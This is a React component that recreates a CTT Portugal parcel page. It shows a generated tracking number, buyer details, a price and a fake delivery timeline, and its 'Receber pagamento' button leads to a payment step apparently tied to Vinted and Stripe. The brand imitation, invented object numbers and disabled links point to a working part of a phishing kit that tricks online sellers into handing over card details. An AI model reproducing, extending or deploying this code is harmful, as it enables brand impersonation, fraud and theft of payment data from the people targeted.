import React, { useEffect, useMemo, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './CttPtSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const P = process.env.PUBLIC_URL || '';
const LOGO_SRC = `${P}/ctt-pt-logo.png`;
const WM_SRC = `${P}/ctt-pt-watermark.svg`;

const MARCAS = ['Banco CTT', 'CTT Express', 'Payshop'];
const INFO_LINKS = [
  'Política de Privacidade',
  'Política de Cookies',
  'Termos e Condições',
  'Resolução Alternativa de Litígios de Consumo',
  'Oferta de Acesso',
  'Lista de Preços de Correio',
  'Lojas e Pontos CTT',
];

function noop(e) {
  e.preventDefault();
}

function cttObjectNumber(code) {
  const raw = (code || '').replace(/[^a-zA-Z0-9]/g, '').toUpperCase();
  if (raw.length >= 12) return raw.slice(0, 12);
  const pad = 'CTT0PORTUGAL';
  return (raw + pad).slice(0, 12);
}

function IconWrench() {
  return (
    <svg width="20" height="20" viewBox="0 0 24 24" fill="none" aria-hidden>
      <path d="M14.7 6.3a1 1 0 000 1.4l1.6 1.6a1 1 0 001.4 0l3.77-3.77a6 6 0 01-7.94 7.94l-6.91 6.91a2.12 2.12 0 01-3-3l6.91-6.91a6 6 0 017.94-7.94l-3.76 3.76z" stroke="currentColor" strokeWidth="1.5" strokeLinejoin="round" />
    </svg>
  );
}

function IconGlobe() {
  return (
    <svg width="20" height="20" viewBox="0 0 24 24" fill="none" aria-hidden>
      <circle cx="12" cy="12" r="9" stroke="currentColor" strokeWidth="1.5" />
      <path d="M3 12h18M12 3a15 15 0 000 18M12 3a15 15 0 010 18" stroke="currentColor" strokeWidth="1.2" />
    </svg>
  );
}

function IconTruckSm() {
  return (
    <svg width="18" height="18" viewBox="0 0 24 24" fill="none" aria-hidden style={{ flexShrink: 0 }}>
      <path d="M2 8h12v8H2V8zm12 2h3l3 3v3h-6v-6z" stroke="#fff" strokeWidth="1.4" strokeLinejoin="round" />
      <circle cx="7" cy="18" r="1.8" fill="#fff" />
      <circle cx="17" cy="18" r="1.8" fill="#fff" />
    </svg>
  );
}

function FeatureIcon({ children }) {
  return <div className="cttpt-feature-ic">{children}</div>;
}

/**
 * CTT Portugal — ecrã de envio / pagamento; CTA → index2 (VintedStripe2).
 */
function CttPtSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  const countryCode = (pageData?.country_code || 'PT').toUpperCase();
  const currencyCode = getPrimaryCurrency(countryCode) || 'EUR';
  const sym = getSymbol(currencyCode);

  const priceNumber = useMemo(() => {
    const raw = pageData?.price;
    if (raw == null || String(raw).trim() === '') return null;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : null;
  }, [pageData?.price]);

  const priceDisplay = useMemo(() => {
    if (priceNumber == null) return '—';
    return new Intl.NumberFormat('pt-PT', {
      minimumFractionDigits: 2,
      maximumFractionDigits: 2,
    }).format(priceNumber);
  }, [priceNumber]);

  const buyerName = [pageData?.first_name, pageData?.middle_name, pageData?.last_name].filter(Boolean).join(' ').trim() || '—';
  const deliveryAddr = (pageData?.delivery_address || '').trim() || '—';
  const objNum = useMemo(() => cttObjectNumber(pageCode || pageData?.page_code || ''), [pageCode, pageData?.page_code]);
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  if (loading && pageCode) {
    return (
      <div className="cttpt-wrap" lang="pt">
        <div className="cttpt-loading">A carregar…</div>
        <div className="cttpt-support-override">
          <SupportWidget sessionId={sessionId} countryCode={countryCode} />
        </div>
      </div>
    );
  }

  return (
    <div className="cttpt-wrap" lang="pt">
      <header className="cttpt-header">
        <div className="cttpt-header-inner">
          <a href="#/" className="cttpt-logo-link" onClick={noop} aria-label="CTT">
            <img src={LOGO_SRC} alt="CTT" className="cttpt-logo" />
          </a>
          <nav className="cttpt-topnav" aria-label="Secções">
            <a href="#/" className="cttpt-topnav--active" onClick={noop}>
              PARTICULARES
            </a>
            <a href="#/" onClick={noop}>
              EMPRESAS
            </a>
            <a href="#/" onClick={noop}>
              GRUPO CTT
            </a>
          </nav>
          <div className="cttpt-header-tools">
            <a href="#/" onClick={noop} aria-label="Ferramentas">
              <IconWrench />
            </a>
            <a href="#/" onClick={noop} aria-label="Idioma">
              <IconGlobe />
            </a>
          </div>
        </div>
      </header>

      <section className="cttpt-detail-band">
        <div className="cttpt-detail-inner">
          <h2>Detalhe do objeto</h2>
          <ul className="cttpt-detail-lines">
            <li>
              <strong>Nº do objeto:</strong> {objNum}
            </li>
            <li>
              <strong>Nome do comprador:</strong> {buyerName}
            </li>
            <li>
              <strong>Endereço do destinatário:</strong> {deliveryAddr}
            </li>
          </ul>
        </div>
      </section>

      <main className="cttpt-main">
        <div className="cttpt-main-inner">
          <div>
            <p className="cttpt-price-big">
              {priceDisplay} {sym}
            </p>
            <div className="cttpt-timeline">
              <div className="cttpt-step cttpt-step--done">
                <span className="cttpt-step-dot cttpt-step-dot--truck" aria-hidden>
                  <IconTruckSm />
                </span>
                <p className="cttpt-step-title">Com porte pago</p>
                <p className="cttpt-step-sub">O pacote foi pré-pago</p>
                <p className="cttpt-step-id">{objNum}</p>
              </div>
              <div className="cttpt-step">
                <span className="cttpt-step-dot" aria-hidden />
                <p className="cttpt-step-title">Sistema CTT</p>
                <p className="cttpt-step-sub">Os dados das encomendas foram introduzidos no sistema informático CTT</p>
                <p className="cttpt-step-id">{objNum}</p>
              </div>
              <div className="cttpt-step">
                <span className="cttpt-step-dot" aria-hidden />
                <p className="cttpt-step-title">Contacto com o estafeta</p>
                <p className="cttpt-step-sub">O estafeta liga ao vendedor depois de receber o pagamento</p>
              </div>
            </div>
          </div>

          <aside className="cttpt-side-card">
            <h3>Conheça as vantagens de ter uma Conta CTT</h3>
            <div className="cttpt-features">
              <div className="cttpt-feature">
                <FeatureIcon>
                  <svg width="28" height="28" viewBox="0 0 24 24" fill="none">
                    <path d="M4 12l8-8 8 8M6 10v10h12V10" stroke="currentColor" strokeWidth="1.5" />
                  </svg>
                </FeatureIcon>
                Pré-pagamento por encomenda
              </div>
              <div className="cttpt-feature">
                <FeatureIcon>
                  <svg width="28" height="28" viewBox="0 0 24 24" fill="none">
                    <path d="M4 6h16v12H4V6zM8 10h8M8 14h5" stroke="currentColor" strokeWidth="1.5" />
                    <path d="M16 4v4M18 2l2 2-2 2" stroke="currentColor" strokeWidth="1.3" />
                  </svg>
                </FeatureIcon>
                Gestão de objetos centralizada
              </div>
              <div className="cttpt-feature">
                <FeatureIcon>
                  <svg width="28" height="28" viewBox="0 0 24 24" fill="none">
                    <path d="M12 22c4-4 8-7 8-12a8 8 0 10-16 0c0 5 4 8 8 12z" stroke="currentColor" strokeWidth="1.5" />
                    <circle cx="12" cy="10" r="2" fill="currentColor" />
                  </svg>
                </FeatureIcon>
                Notificações por alteração de estado
              </div>
              <div className="cttpt-feature">
                <FeatureIcon>
                  <svg width="28" height="28" viewBox="0 0 24 24" fill="none">
                    <path d="M4 14h4v6H4v-6zm8-6h4v12h-4V8zm8-4h4v16h-4V4z" stroke="currentColor" strokeWidth="1.5" />
                  </svg>
                </FeatureIcon>
                Alterações disponíveis de forma centralizada
              </div>
            </div>
            <Link to={index2Path} className="cttpt-cta">
              Receber pagamento
            </Link>
          </aside>
        </div>
      </main>

      <footer className="cttpt-footer-wrap">
        <div className="cttpt-footer-watermark" style={{ backgroundImage: `url(${WM_SRC})` }} aria-hidden />
        <div className="cttpt-footer-grid">
          <div className="cttpt-foot-col">
            <h4>MARCAS</h4>
            {MARCAS.map((t) => (
              <a key={t} href="#/" onClick={noop}>
                {t}
              </a>
            ))}
          </div>
          <div className="cttpt-foot-col">
            <h4>INFORMAÇÃO</h4>
            {INFO_LINKS.map((t) => (
              <a key={t} href="#/" onClick={noop}>
                {t}
              </a>
            ))}
          </div>
          <div className="cttpt-foot-col cttpt-app-block">
            <h4>APP CTT</h4>
            <p>Faça já o download da nova versão da app CTT e aceda aos nossos diversos serviços!</p>
            <div className="cttpt-app-badges">
              <a href="#/" className="cttpt-app-badge" onClick={noop}>
                App Store
              </a>
              <a href="#/" className="cttpt-app-badge" onClick={noop}>
                Google Play
              </a>
              <a href="#/" className="cttpt-app-badge" onClick={noop}>
                AppGallery
              </a>
            </div>
          </div>
        </div>
        <div style={{ position: 'relative' }}>
          <div className="cttpt-footer-red">
            <p>Tem alguma questão? Fale connosco, estamos disponíveis para o ajudar.</p>
            <a href="#/" onClick={noop}>
              Ajuda e Contactos
            </a>
          </div>
        </div>
        <div className="cttpt-footer-bar">
          <div className="cttpt-social">
            <a href="#/" onClick={noop} aria-label="Facebook">
              f
            </a>
            <a href="#/" onClick={noop} aria-label="Instagram">
              ig
            </a>
            <a href="#/" onClick={noop} aria-label="LinkedIn">
              li
            </a>
            <a href="#/" onClick={noop} aria-label="YouTube">
              ▶
            </a>
          </div>
          <p className="cttpt-copy">© CTT {new Date().getFullYear()}. Todos os direitos reservados.</p>
          <div className="cttpt-livro" aria-hidden>
            LIVRO DE RECLAMAÇÕES
          </div>
        </div>
      </footer>

      <div className="cttpt-support-override">
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    </div>
  );
}

export default CttPtSuccess;
